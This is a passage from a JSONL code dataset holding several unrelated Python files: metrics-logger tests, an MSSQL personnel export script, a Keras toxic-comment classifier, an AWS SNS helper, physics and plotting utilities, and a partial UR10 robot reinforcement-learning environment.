\"{ 'foo': NOTHING }\"\n )\n # making sure it's the right exception\n assert str(exc_info.value).startswith(\"During parsing of JSON properties\")\n\n # test failure if dict is not provided\n with pytest.raises(ValueError) as exc_info:\n metrics_logger.set_properties_from_json(\n \"[\\\"bla\\\", \\\"foo\\\"]\"\n )\n # making sure it's the right exception\n assert str(exc_info.value).startswith(\"Provided JSON properties should be a dict\")\n\n@patch('mlflow.log_params')\ndef 
test_metrics_logger_log_parameters(mlflow_log_params_mock):\n \"\"\" Tests MetricsLogger().log_parameters() \"\"\"\n metrics_logger = MetricsLogger()\n\n metrics_logger.log_parameters(\n key1 = \"foo\",\n key2 = 0.45\n )\n mlflow_log_params_mock.assert_called_with(\n { 'key1' : \"foo\", 'key2' : 0.45 }\n )\n\n\n@patch('mlflow.log_metric')\ndef test_metrics_logger_log_time_block(mlflow_log_metric_mock):\n \"\"\" Tests MetricsLogger().log_time_block() \"\"\"\n metrics_logger = MetricsLogger()\n\n with metrics_logger.log_time_block(\"foo_metric\"):\n time.sleep(0.01)\n\n mlflow_log_metric_mock.assert_called_once()\n","sub_path":"tests/common/test_metrics.py","file_name":"test_metrics.py","file_ext":"py","file_size_in_byte":3778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"440017891","text":"import xlwt\nimport pymssql\nfrom test.读取花名册excel数据 import renyuan\n\n\nclass MSSQL:\n def __init__(self,host,user,pwd,db):\n self.host=host\n self.user=user\n self.pwd=pwd\n self.db=db\n\n def GetConnect(self):\n if not self.db:\n raise(NameError,'没有目标数据库')\n self.connect=pymssql.connect(host=self.host,user=self.user,password=self.pwd,database=self.db,charset='utf8')\n cur=self.connect.cursor()\n if not cur:\n raise(NameError,'数据库访问失败')\n else:\n return cur\n\n def ExecSql(self,sql,para):#带变量的sql语句\n cur=self.GetConnect()\n cur.execute(sql,para)\n self.connect.commit()\n self.connect.close()\n\n def ExecQuery(self,sql):\n cur= self.GetConnect()\n cur.execute(sql)\n resList = cur.fetchall()\n self.connect.close()\n return resList\n\n\ndef main():\n ms = MSSQL(host=\"192.168.10.77\", user=\"sa\", pwd=\"sa\", db=\"STCard_Enp\")\n resList = ms.ExecQuery(\"select *from ST_Person where Person_Name <>'外来' and Is_Del <>1 and Dept_ID <>9 and Dept_ID <>3 \"\n \"and Dept_ID <>7 and Dept_ID <>8 and Card_No <>''\")\n k = 0\n path = r\"D:\\非在职人员名单.xls\"\n workbook = xlwt.Workbook() # 新建一个工作簿\n sheet = workbook.add_sheet(\"非在职人员名单\") # 在工作簿中新建一个表格\n for i in range(0,len(resList)):\n if resList[i][4] not in renyuan():\n x=resList[i][4]\n # ms.ExecSql(\"update ST_person set is_del=1 where person_name =%s and Is_Del <>1 and Dept_ID <>9 and Dept_ID <>3 \"\n # \"and Dept_ID <>7 and Dept_ID <>8 and Card_No <>''\",x)\n #清理姓名时去掉注销\n print(resList[i][4])\n sheet.write(k, 0, resList[i][4]) # 像表格中写入数据(对应的行和列)\n k=k+1\n workbook.save(path) # 保存工作簿\n print(\"xls格式表格写入数据成功!\")\n\n\nif __name__ == '__main__':\n main()\n input(\"执行完成................!\")\n","sub_path":"test/MSSQL_Connect.py","file_name":"MSSQL_Connect.py","file_ext":"py","file_size_in_byte":2125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"180881658","text":"def solve(nm_set):\n for i in range(len(nm_set)):\n n = int(nm_set[i][0])\n m = int(nm_set[i][1])\n cnt = 0\n\n for num in range(n, m + 1):\n cnt += str(num).count('0')\n\n print(cnt)\n\n\n\nif __name__ == '__main__':\n t = int(input())\n input_set = list()\n for i in range(t):\n input_set.append(input().split())\n\n solve(input_set)","sub_path":"박민/[20.09.10]11170.py","file_name":"[20.09.10]11170.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"64006747","text":"import json, sys, subprocess, os, argparse, logging\nfrom collections import deque\nimport numpy as np\nfrom noodle.scorematrix import ScoreMatrixReader\nfrom noodle.evaluation import get_precision_recall\n\ndef parse_output(matrix, runfile, 
threshold, mask):\n with open(runfile) as f:\n results = json.load(f)\n ps, rs, ts = deque([]), deque([]), deque([])\n names = np.array(matrix.get_attr_names())[mask]\n for q, r in results.items():\n runtime = r['runtime']\n result = r['results']\n scores = matrix.get_scores(q)[mask]\n ref = names[scores >= threshold]\n precision, recall = get_precision_recall(result, ref)\n ps.append(precision)\n rs.append(recall)\n ts.append(runtime) \n return list(ps), list(rs), list(ts) \n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-m\", \"--matrix-dir\", type=str,\n default=\"_matrix\")\n parser.add_argument(\"-a\", \"--index-attr\", type=str,\n default=\"_index_attrs_10_9999999.json\")\n parser.add_argument(\"-i\", \"--result-dir\", type=str)\n args = parser.parse_args(sys.argv[1:])\n\n matrix = ScoreMatrixReader(args.matrix_dir, cache_size=1000)\n index_attrs = set(json.load(open(args.index_attr)))\n mask = np.array([i in index_attrs for i in matrix.get_attr_names()])\n\n results = {}\n for f in os.listdir(args.result_dir):\n t = float(os.path.splitext(f)[0])\n results[t] = os.path.join(args.result_dir, f)\n \n precisions = []\n recalls = []\n runtimes = []\n thresholds = sorted(results.keys())\n for t in thresholds:\n ps, rs, ts = parse_output(matrix, results[t], t, mask)\n precisions.append(np.mean(ps))\n recalls.append(np.mean(rs))\n runtimes.append(np.mean(ts))\n\n import matplotlib\n matplotlib.use('Agg')\n import matplotlib.pyplot as plt\n #plt.style.use(\"/home/ekzhu/noodle/acm-2col.mplstyle\")\n # Plot precision vs recalls\n fig, axes = plt.subplots(1, 2, figsize=(10, 5))\n axes[0].plot(thresholds, precisions, marker=\"+\")\n axes[1].plot(thresholds, recalls, marker=\"+\")\n # Labels\n axes[0].set_ylabel(\"Precision\")\n axes[1].set_ylabel(\"Recall\")\n for ax in axes:\n ax.set_xlim(0,1)\n ax.set_ylim(0,1)\n ax.grid()\n ax.set_xlabel(\"Containment Threshold\")\n# box = ax.get_position()\n# ax.set_position([box.x0, box.y0 + box.height * 0.15, \n# box.width, box.height * 0.85])\n fig.savefig(\"linearscan.png\")\n plt.close()\n # Plot runtime\n fig, axes = plt.subplots(1, 1)\n axes.plot(thresholds, runtimes, marker=\"+\")\n axes.set_ylabel(\"Runtime (ms)\")\n axes.set_xlabel(\"Containment Threshold\")\n axes.set_ylim(ymin=0)\n axes.grid()\n fig.savefig(\"linearscan_runtime.png\")\n plt.close()\n","sub_path":"linearscan.py","file_name":"linearscan.py","file_ext":"py","file_size_in_byte":2826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"622948560","text":"# Copyright (C) 2013 Google Inc., authors, and contributors \n# Licensed under http://www.apache.org/licenses/LICENSE-2.0 \n# Created By:\n# Maintained By: vraj@reciprocitylabs.com\n\nfrom ggrc import db\nfrom .mixins import deferred, Base\n\nclass PbcList(Base, db.Model):\n __tablename__ = 'pbc_lists'\n\n audit_cycle_id = deferred(\n db.Column(db.Integer, db.ForeignKey('cycles.id'), nullable=False),\n 'PbcList')\n\n requests = db.relationship(\n 'Request', backref='pbc_list', cascade='all, delete-orphan')\n control_assessments = db.relationship(\n 'ControlAssessment', backref='pbc_list', cascade='all, delete-orphan')\n\n _publish_attrs = [\n 'audit_cycle',\n 'requests',\n 'control_assessments',\n ]\n\n @classmethod\n def eager_query(cls):\n from sqlalchemy import orm\n\n query = super(PbcList, cls).eager_query()\n return query.options(\n orm.joinedload('audit_cycle'),\n orm.subqueryload('requests'),\n 
orm.subqueryload('control_assessments'))\n","sub_path":"src/ggrc/models/pbc_list.py","file_name":"pbc_list.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"89918688","text":"# Author: Izaak Neutelings (July 2019)\n# https://twiki.cern.ch/twiki/bin/viewauth/CMS/TauIDRecommendation13TeV\nimport os\nfrom TauPOG.TauIDSFs import ensureTFile, extractTH1\ndatapath = os.environ['CMSSW_BASE']+\"/src/TauPOG/TauIDSFs/data\"\n\nclass TauIDSFTool:\n \n def __init__(self, year, id, wp='Tight', dm=False, path=datapath):\n \"\"\"Choose the IDs and WPs for SFs. For available tau IDs and WPs, check\n https://cms-nanoaod-integration.web.cern.ch/integration/master-102X/mc102X_doc.html#Tau\"\"\"\n \n years = ['2016Legacy','2017ReReco','2018ReReco']\n assert year in years, \"You must choose a year from %s.\"%(', '.join(years))\n self.ID = id\n self.WP = wp\n \n if id in ['MVAoldDM2017v2','DeepTau2017v2p1VSjet']:\n if dm:\n file = ensureTFile(\"%s/TauID_SF_dm_%s_%s.root\"%(path,id,year))\n self.hist = extractTH1(file,wp)\n self.hist.SetDirectory(0)\n file.Close()\n self.DMs = [0,1,10] if 'oldDM' in id else [0,1,10,11]\n self.getSFvsPT = self.disabled\n self.getSFvsEta = self.disabled\n else:\n file = ensureTFile(\"%s/TauID_SF_pt_%s_%s.root\"%(path,id,year))\n self.func = { }\n self.func[None] = file.Get(\"%s_cent\"%(wp))\n self.func['Up'] = file.Get(\"%s_up\"%(wp))\n self.func['Down'] = file.Get(\"%s_down\"%(wp))\n file.Close()\n self.getSFvsDM = self.disabled\n self.getSFvsEta = self.disabled\n elif id in ['antiMu3','antiEleMVA6']:\n file = ensureTFile(\"%s/TauID_SF_eta_%s_%s.root\"%(path,id,year))\n self.hist = extractTH1(file,wp)\n self.hist.SetDirectory(0)\n file.Close()\n self.genmatches = [1,3] if 'ele' in id.lower() else [2,4]\n self.getSFvsPT = self.disabled\n self.getSFvsDM = self.disabled\n else:\n raise IOError(\"Did not recognize tau ID '%s'!\"%id)\n \n def getSFvsPT(self, pt, genmatch=5, unc=None):\n \"\"\"Get tau ID SF vs. tau pT.\"\"\"\n if genmatch==5:\n return self.func[unc].Eval(pt)\n return 1.0\n \n def getSFvsDM(self, pt, dm, genmatch=5, unc=None):\n \"\"\"Get tau ID SF vs. tau DM.\"\"\"\n if dm in self.DMs or pt<40:\n if genmatch==5:\n bin = self.hist.GetXaxis().FindBin(dm)\n SF = self.hist.GetBinContent(bin)\n if unc=='Up':\n SF += self.hist.GetBinError(bin)\n elif unc=='Down':\n SF -= self.hist.GetBinError(bin)\n return SF\n return 1.0\n return 0.0\n \n def getSFvsEta(self, eta, genmatch, unc=None):\n \"\"\"Get tau ID SF vs. 
tau eta.\"\"\"\n eta = abs(eta)\n if genmatch in self.genmatches:\n bin = self.hist.GetXaxis().FindBin(eta)\n SF = self.hist.GetBinContent(bin)\n if unc=='Up':\n SF += self.hist.GetBinError(bin)\n elif unc=='Down':\n SF -= self.hist.GetBinError(bin)\n return SF\n return 1.0\n \n @staticmethod\n def disabled(*args,**kwargs):\n raise AttributeError(\"Disabled method.\")\n \n","sub_path":"python/TauIDSFTool.py","file_name":"TauIDSFTool.py","file_ext":"py","file_size_in_byte":3211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"10147643","text":"from app import sns_client, sns_resource\nimport os\n\nBASE_ARN = os.environ.get('SNS_BASE_ARN', '')\nPLATFORM_ARN = os.environ.get('SNS_PLATFORM_ARN', '')\nANDROID_ARN = os.environ.get('SNS_ANDROID_ARN', '')\n\ndef subscribe_device(user_id, device_token, ios=True):\n arn_platform = PLATFORM_ARN if ios else ANDROID_ARN\n resp = sns_client.create_platform_endpoint(\n PlatformApplicationArn=arn_platform,\n Token=device_token\n )\n \n endpoint_arn = resp.get('EndpointArn', None)\n if endpoint_arn is None:\n return\n\n # Subscribe this device to user's notifications\n resp = sns_client.create_topic(Name=user_id)\n topic_arn = resp.get('TopicArn', None)\n if topic_arn is None:\n return\n\n sns_client.subscribe(\n TopicArn=topic_arn,\n Protocol='application',\n Endpoint=endpoint_arn\n )\n\ndef publish_to_user(user_id, message):\n topic_arn = BASE_ARN + user_id\n topic = sns_resource.Topic(topic_arn)\n topic.publish(\n TopicArn=topic_arn,\n Message=message\n )\n\n","sub_path":"server/app/aws_sns.py","file_name":"aws_sns.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"450586454","text":"\n\nfrom xai.brain.wordbase.adjectives._arctic import _ARCTIC\n\n#calss header\nclass _ARCTICS(_ARCTIC, ):\n\tdef __init__(self,): \n\t\t_ARCTIC.__init__(self)\n\t\tself.name = \"ARCTICS\"\n\t\tself.specie = 'adjectives'\n\t\tself.basic = \"arctic\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/adjectives/_arctics.py","file_name":"_arctics.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"123015139","text":"\"\"\"\nTODO: None!\n\"\"\"\nimport numpy as np\nimport keras.backend as K\nfrom keras.models import Model\nfrom keras.layers import concatenate, multiply\nfrom keras.layers import BatchNormalization, Dropout, SpatialDropout1D\nfrom keras.layers import GlobalMaxPool1D\nfrom keras.layers import Activation, Lambda, Permute, Reshape, RepeatVector, TimeDistributed\nfrom keras.layers import Bidirectional, CuDNNGRU, Dense, Embedding, Input\n\nfrom utils import get_embeddings\nfrom utils import shuffle_data\n\n\nclass ToxicClassifier(object):\n \"\"\"Class for classifying the toxicity of a sentence.\n\n Parameters\n ----------\n embedding_dim : Scalar dimension of input embeddings.\n num_timesteps : Maximum number of timesteps to be processed (i.e. num. 
words in input).\n word_index : List of all tokens (words) in the corpus.\n weight_path : String specifying where to save weights during training.\n use_aux_input : Boolean, use auxilliary input during training and testing.\n average_attention : Boolean, verage attention values over the time dimension for each input.\n use_ft : Boolean, use fasttext embeddings instead of GloVe embeddings.\n visualize : Boolean, create plots of attention activations.\n \"\"\"\n\n def __init__(self, embedding_dim, num_timesteps, word_index, weight_path,\n use_aux_input=False, average_attention=False,\n use_ft=False, visualize=False):\n self.embedding_dim = embedding_dim\n self.num_timesteps = num_timesteps\n self.attention_layer_count = 0\n\n self.weight_path = weight_path\n\n self.average_attention = average_attention\n self.use_aux_input = use_aux_input\n self.use_ft = use_ft\n self.visualize = visualize\n\n self.CLASS_LIST = ['toxic', 'severe_toxic', 'obscene',\n 'threat', 'insult', 'identity_hate']\n\n def get_attention_output(self):\n \"\"\"Return attention of a single input to the model.\n\n Returns\n -------\n attention: Array of attention weight for teach element in input.\n\n \"\"\"\n self.load_best_weights\n if self.use_aux_input:\n attention = self.attention_layer_model.predict(\n [self.sample_sequence.reshape(1, self.num_timesteps),\n self.sample_aux.reshape(1, 3)],\n batch_size=1)\n else:\n attention = self.attention_layer_model.predict(\n self.sample_sequence.reshape(1, self.num_timesteps), batch_size=1)\n\n return attention[0, -self.sample_length:, 0]\n\n def get_sample_labels(self):\n \"\"\"Return class names corresponding to sample target.\"\"\"\n labels = [i for i, j in zip(self.CLASS_LIST, self.sample_target) if j]\n if labels == []:\n labels = ['not_toxic']\n\n return labels\n\n def get_training_predictions(self):\n return self.model.predict_on_dataset([self.X_train, self.X_aux])\n\n def set_input_and_labels(self, X_train, y_train, X_aux=None):\n \"\"\"Set training input and -labels.\n\n Parameters\n ----------\n X_train : Array of input features.\n y_train : Array of output labels.\n X_aux : Optional array of auxilliary inputs, i.e. engineered features.\n\n \"\"\"\n self.X_train = X_train\n self.y_train = y_train\n self.X_aux = X_aux\n\n def set_sample_sentence(self, sample_text, sample_sequence,\n sample_target, sample_aux=None):\n \"\"\"Set sample sentence and variables to store attention activations.\n\n Parameters\n ----------\n sample_text : Preprocessed text of sample.\n sample_sequence : Padded and tokenized representation of sample text.\n sample_aux : Optional auxilliary input for sample, i.e. engineered features.\n \"\"\"\n self.sample_text = sample_text\n self.sample_sequence = sample_sequence\n self.sample_target = sample_target\n self.sample_aux = sample_aux\n self.sample_length = len(self.sample_text.split(' '))\n if self.visualize:\n self.attention_history = np.zeros((1, self.sample_length))\n\n def _attention_3d_block(self, inputs):\n \"\"\"Return attention vector evaluated over input. If SINGLE_ATTENTION_VECTOR\n argument is given a temporal mean is taken over the time_step dimension.\n\n Parameters\n ----------\n inputs : A tensor of shape (batch_size, time_steps, input_dim).\n Time_steps is represented by the input length, i.e. 
the number of tokens,\n while input_dim is the number of nodes in the previous nn layer.\n\n Returns\n -------\n output_attention : A tensor of shape (batch_size, time_steps, input_dim),\n representing the attention given to each input token.\n\n \"\"\"\n self.attention_layer_count += 1\n input_dim = int(inputs.shape[2])\n a = Permute((2, 1))(inputs)\n a = Reshape((input_dim, self.num_timesteps))(a)\n a = Dense(self.num_timesteps, activation='softmax')(a)\n\n if self.average_attention:\n a = Lambda(lambda x: K.mean(x, axis=1), name='dim_reduction')(a)\n a = RepeatVector(input_dim)(a)\n\n attention_layer_name = 'attention_layer_' + str(self.attention_layer_count)\n context_name = 'context_vec_' + str(self.attention_layer_count)\n self.last_attention_layer_name = attention_layer_name\n\n a_probs = Permute((2, 1), name=attention_layer_name)(a)\n output_attention = multiply([inputs, a_probs], name=context_name)\n\n return output_attention\n\n def build_model(self, word_index, use_skipgram=True):\n \"\"\"Return a compiled Keras model for sentence classification.\n\n Parameters\n ----------\n word_index : List of tokens in input data\n use_skipgram : Boolean, whether to use fasttext skipgram word vectors.\n If false, cbow model word vectors will be used instead.\n\n Returns\n -------\n model : A compiled Keras model for predicting six types of toxicity\n in a sentencee.\n attention_layer_model : A Keras model for extracting the attention\n layer output.\n\n \"\"\"\n\n gru_units = [96]\n dense_units = [64]\n\n dropout_prob = 0.4\n\n model_input = Input(shape=(self.num_timesteps, ), name='model_input')\n embedding_matrix = get_embeddings(word_index=word_index,\n embedding_dim=self.embedding_dim,\n use_ft_embeddings=self.use_ft,\n use_skipgram=use_skipgram)\n x = Embedding(len(word_index) + 1, # +1 for 0 padding token\n self.embedding_dim,\n weights=[embedding_matrix],\n input_length=self.num_timesteps,\n trainable=False)(model_input)\n\n for n in range(len(gru_units)):\n x = SpatialDropout1D(dropout_prob)(x)\n x = Bidirectional(CuDNNGRU(units=gru_units[n],\n return_sequences=True))(x)\n x = BatchNormalization()(x)\n x = TimeDistributed(Activation('tanh'))(x)\n\n x = SpatialDropout1D(dropout_prob)(x)\n attention = self._attention_3d_block(inputs=x)\n dense_input = GlobalMaxPool1D()(attention)\n\n if self.use_aux_input:\n aux_input = Input(shape=(3, ), name='aux_input')\n dense_input = concatenate([dense_input, aux_input])\n\n for n in range(len(dense_units)):\n dense = Dropout(dropout_prob)(dense_input)\n dense = Dense(dense_units[n], activation=None)(dense)\n dense = BatchNormalization()(dense)\n dense = Activation('elu')(dense)\n\n dense = Dropout(dropout_prob)(dense)\n probs = Dense(6, activation='sigmoid')(dense)\n\n if self.use_aux_input:\n self.model = Model(inputs=[model_input, aux_input], output=probs)\n else:\n self.model = Model(inputs=model_input, output=probs)\n\n self.model.compile(loss='binary_crossentropy',\n optimizer='rmsprop',\n metrics=['accuracy'])\n print(self.last_attention_layer_name)\n self.attention_layer_model = Model(inputs=self.model.input,\n outputs=self.model.get_layer(\n self.last_attention_layer_name).output)\n\n def load_best_weights(self):\n \"\"\"Load best weights into model.\"\"\"\n self.model.load_weights(self.weight_path)\n\n def train(self, max_epochs, batch_size, val_split, callbacks):\n \"\"\"Train model, using specified epoch number, batch_size and callbacks.\n\n Parameters\n ----------\n max_epochs : The maximum number of epochs to train for.\n batch_size 
: Batch size used during training, i.e. the number of sentences.\n callbacks : List of Keras callbacks.\n\n \"\"\"\n if self.use_aux_input:\n _X_train, _y_train, _X_aux = shuffle_data(self.X_train, self.y_train, self.X_aux)\n else:\n _X_train, _y_train = shuffle_data(self.X_train, self.y_train)\n\n if self.visualize:\n for epoch in range(max_epochs):\n if self.use_aux_input:\n self.model.fit([_X_train, _X_aux], _y_train,\n batch_size=batch_size,\n epochs=epoch + 1,\n initial_epoch=epoch,\n validation_split=val_split,\n callbacks=callbacks)\n attention_output = self.attention_layer_model.predict(\n [self.sample_sequence.reshape(1, self.num_timesteps),\n self.sample_aux.reshape(1, 3)], batch_size=1)\n else:\n self.model.fit(_X_train, _y_train,\n batch_size=batch_size,\n epochs=epoch + 1,\n initial_epoch=epoch,\n validation_split=val_split,\n callbacks=callbacks)\n # predict directly so the output shape matches the aux-input branch\n attention_output = self.attention_layer_model.predict(\n self.sample_sequence.reshape(1, self.num_timesteps),\n batch_size=1)\n\n self.attention_history = np.append(\n self.attention_history,\n [attention_output[0, -self.sample_length:, 0]],\n axis=0)\n else:\n if self.use_aux_input:\n self.model.fit([_X_train, _X_aux], _y_train,\n batch_size=batch_size,\n epochs=max_epochs,\n validation_split=val_split,\n callbacks=callbacks)\n else:\n self.model.fit(_X_train, _y_train,\n batch_size=batch_size,\n epochs=max_epochs,\n validation_split=val_split,\n callbacks=callbacks)\n print('Training done\\n')\n\n def predict_on_dataset(self, data, aux_input=None):\n \"\"\"Predict on an entire dataset at once using trained model.\n\n Parameters\n ----------\n data : Numpy array containing input data.\n aux_input : Optional auxiliary input (i.e. engineered features).\n\n Returns\n -------\n preds : Array of probabilities for the different types of toxicity.\n\n \"\"\"\n self.load_best_weights()\n if aux_input is not None:\n try:\n assert self.use_aux_input\n except AssertionError:\n print('ERROR: Unexpected auxiliary input passed to predict function')\n raise\n preds = self.model.predict([data, aux_input])\n else:\n preds = self.model.predict(data)\n\n return preds\n\n def predict_sample_output(self):\n \"\"\"Predict on a single sample text using trained model.\n\n Returns\n -------\n pred : Array of probabilities for the different types of toxicity.\n\n \"\"\"\n self.load_best_weights()\n if self.use_aux_input:\n pred = self.model.predict([self.sample_sequence.reshape(1, self.num_timesteps),\n self.sample_aux.reshape(1, 3)],\n batch_size=1)\n else:\n pred = self.model.predict(self.sample_sequence.reshape(1, self.num_timesteps),\n batch_size=1)\n\n return pred\n","sub_path":"toxic_classifier.py","file_name":"toxic_classifier.py","file_ext":"py","file_size_in_byte":12674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"516781443","text":"#!/usr/bin/env python\nimport pandas as pd\nimport matplotlib as mpl\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sys\n\nimg = sys.argv[1]\n\nlabels = ['1', '2', '4', '8', '10']\n\nplt.figure()\nfor label in labels:\n try:\n df = pd.read_csv('%s/cpu_stats.csv' % (label))\n sel = df['com.docker.compose.service'] == 'idlememstat'\n X = df['time'][sel]\n X = np.array(X, dtype='datetime64[ns]')\n Y = df['percent_usage'][sel]\n X = X - X[0]\n plt.plot(X,Y,label=label)\n except Exception as e:\n print(e)\nplt.legend()\nplt.savefig(img)\n","sub_path":"lab/eval/ir/cpucost/data/cpu.py","file_name":"cpu.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"450374094","text":"import os\nimport numpy\nimport yaml\nimport pandas\nimport mujoco_py\nimport json\nfrom gym.envs.robotics import rotations, robot_custom_env, utils\nfrom gym.envs.robotics.ur10 import randomize\nfrom scipy.signal import lfilter, lfilter_zi, butter\n#from utils.saving import NumpyEncoder\n\nPROJECT_PATH = os.path.join(*[os.getenv(\"HOME\"), \"DRL_AI4RoMoCo\"])\nMODEL_PATH = os.path.join(*[PROJECT_PATH, \"code\", \"environment\", \"UR10_new\"])\nCONFIG_PATH = os.path.join(*[PROJECT_PATH, \"code\", \"config\", \"environment\"])\nSAVE_PATH = os.path.join(*[\n PROJECT_PATH, \n \"code\", \n \"data\", \n \"EVAL_SOURCESIM\", \n \"StaticPositionEnv\",\n ])\nGOAL_PATH = os.path.join(*[\n PROJECT_PATH, \n \"code\", \n \"environment\", \n \"experiment_configs\", \n \"goal_ur10_simpheg_conf2.json\"\n ])\n\ndef goal_distance(obs, goal):\n '''Computation of the distance between gripper and goal'''\n obs = obs[:6]\n assert obs.shape == goal.shape\n return numpy.linalg.norm(obs*numpy.array([1, 1, 1, 0.3, 0.3, 0.3]), axis=-1)\n\ndef normalize_rad(angles):\n '''Normalizing Euler angles'''\n angles = numpy.array(angles)\n angles = angles % (2*numpy.pi)\n angles = (angles + 2*numpy.pi) % (2*numpy.pi)\n for i in range(len(angles)):\n if (angles[i] > numpy.pi):\n angles[i] -= 2*numpy.pi\n return angles\n\nclass NumpyEncoder(json.JSONEncoder):\n def default(self, obj):\n if isinstance(obj, numpy.ndarray):\n return obj.tolist()\n return json.JSONEncoder.default(self, obj)\n\nclass Ur10Env(robot_custom_env.RobotEnv):\n \"\"\"Superclass for all Ur10 environments.\"\"\"\n\n def __init__(self, env_config,):\n \n with open(env_config) as cfg:\n env_config = yaml.load(cfg, Loader=yaml.FullLoader)\n\n self.save_data = env_config[\"Saving\"]\n self.start_flag = True\n self.episode = 0\n if self.save_data:\n self.fts = []\n self.fxs = []\n self.fys = []\n self.fzs = []\n self.obs = []\n self.rewards = []\n self.poses = []\n self.SEED = env_config[\"SEED\"]\n self.run_info = env_config[\"info\"]\n self.results = list() #list(numpy.zeros(10,).astype(int))\n self.R1 = env_config[\"Reward\"][\"R1\"]\n self.R2 = env_config[\"Reward\"][\"R2\"]\n self.success_reward = env_config[\"Reward\"][\"success_reward\"]\n self.model_path = os.path.join(*[MODEL_PATH, env_config[\"model_xml_file\"]]) \n self.initial_qpos = numpy.array(env_config[\"initial_qpos\"]) \n self.sim_ctrl_q = self.initial_qpos \n self.reward_type = env_config[\"reward_type\"] \n self.ctrl_type = env_config[\"ctrl_type\"] \n self.n_substeps = env_config[\"n_substeps\"]\n self.action_rate = env_config[\"action_rate\"] \n self.distance_threshold = env_config[\"Learning\"][\"distance_threshold\"]\n self.cur_eps_threshold = env_config[\"Learning\"][\"cur_eps_threshold\"]\n self.curriculum_learning = env_config[\"Learning\"][\"curriculum_learning\"]\n self.initial_distance_threshold = env_config[\"Learning\"][\"initial_distance_threshold\"]\n self.final_distance_threshold = env_config[\"Learning\"][\"final_distance_threshold\"] \n self.fail_threshold = env_config[\"Learning\"][\"fail_threshold\"] \n self.n_actions = env_config[\"n_actions\"]\n self.corrective = env_config[\"corrective\"]\n self.vary = env_config[\"vary\"]\n self.dx_max = env_config[\"dx_max\"]\n \n ########################\n \n super(Ur10Env, self).__init__(\n model_path=self.model_path, n_substeps=self.n_substeps,\n n_actions=self.n_actions,initial_qpos=self.initial_qpos, \n seed=self.SEED, success_reward=self.success_reward,\n action_rate = self.action_rate)\n\n def 
activate_noise(self):\n self.vary=True\n print('noise has been activated.')\n \n def compute_reward(self, obs, goal, info):\n d = goal_distance(obs,goal)\n f = (numpy.absolute(obs[7])\n + numpy.absolute(obs[8])\n + numpy.absolute(obs[9]))\n rew = self.R1 * (-d) + self.R2 *(-f)\n if self.save_data:\n self.rewards.append(rew)\n self.step_count += 1\n return rew\n\n def _step_callback(self):\n pass\n \n def set_state(self, qpos):\n old_state = self.sim.get_state()\n new_state = mujoco_py.MjSimState(\n old_state.time,\n qpos, \n old_state.qvel,\n old_state.act, \n old_state.udd_state)\n self.sim.set_state(new_state)\n self.sim.forward()\n\n def _set_action(self, action):\n assert action.shape == (6,)\n # ensure that we don't change the action outside of this scope\n action = action.copy() \n deviation = sum(abs(self.sim.data.qpos - self.sim.data.ctrl))\n\n # reset control to current position if deviation too high\n if deviation > 0.35: \n self.sim.data.ctrl[:] = (self.sim.data.qpos\n + self.get_dq([0, 0, 0.005, 0, 0, 0]))\n print('deviation compensated')\n\n if self.ctrl_type == \"joint\":\n action *= 0.05 # limit maximum change in position\n # Apply action scalars to simulation.\n utils.ctrl_set_action(self.sim, action)\n elif self.ctrl_type == \"cartesian\":\n dx = action.reshape(6, )\n\n max_limit = self.dx_max\n '''\n limitation of the operation space: we only allow small rotations,\n adjustments in x and z directions, and moving in the y direction\n '''\n x_now = numpy.concatenate((\n self.sim.data.get_body_xpos(\"gripper_dummy_heg\"),\n self.sim.data.get_body_xquat(\"gripper_dummy_heg\")))\n x_then = x_now[:3] + dx[:3]*max_limit\n\n #diff_now = numpy.array(x_now - self.init_x).reshape(7,)\n diff_then = numpy.array(x_then[:3] - self.init_x[:3])\n\n barriers_min = numpy.array([-0.4, -0.8, -0.4])\n barriers_max = numpy.array([0.4, 0.8, 0.4])\n '''\n for i in range(3):\n if (barriers_min[i] < diff_then[i] < barriers_max[i]):\n dx[i] = dx[i] * max_limit\n elif barriers_min[i] > diff_then[i]:\n dx[i] = + max_limit\n elif barriers_max[i] < diff_then[i]:\n dx[i] = - max_limit\n for i in range(3,6):\n dx[i] = dx[i] * max_limit\n '''\n for i in range(6):\n dx[i] = dx[i] * max_limit\n \n if self.corrective:\n # bias in direction of assembly\n bias_dir = -self.last_obs[:6]\n # print(bias_dir)\n for i in range(3,6):\n if bias_dir[i] > 0.5:\n print(i, bias_dir[i])\n bias_dir[i] = bias_dir[i] # slower rotations\n bias_dir /= numpy.linalg.norm(bias_dir)\n # print(bias_dir)\n dx += bias_dir * max_limit * 0.5\n dx.reshape(6, 1)\n\n dq = self.get_dq(dx)\n # print(sum(abs(sim.data.qpos-sim.data.ctrl)))\n for i in range(6):\n self.sim.data.ctrl[i] += dq[i]\n\n def get_dq(self, dx):\n jacp = self.sim.data.get_body_jacp(name=\"gripper_dummy_heg\").reshape(3, 6)\n jacr = self.sim.data.get_body_jacr(name=\"gripper_dummy_heg\").reshape(3, 6)\n jac = numpy.vstack((jacp, jacr))\n dq = numpy.linalg.lstsq(jac, dx)[0].reshape(6, )\n return dq\n\n def _get_obs(self):\n rot_mat = self.sim.data.get_body_xmat('gripper_dummy_heg')\n ft = 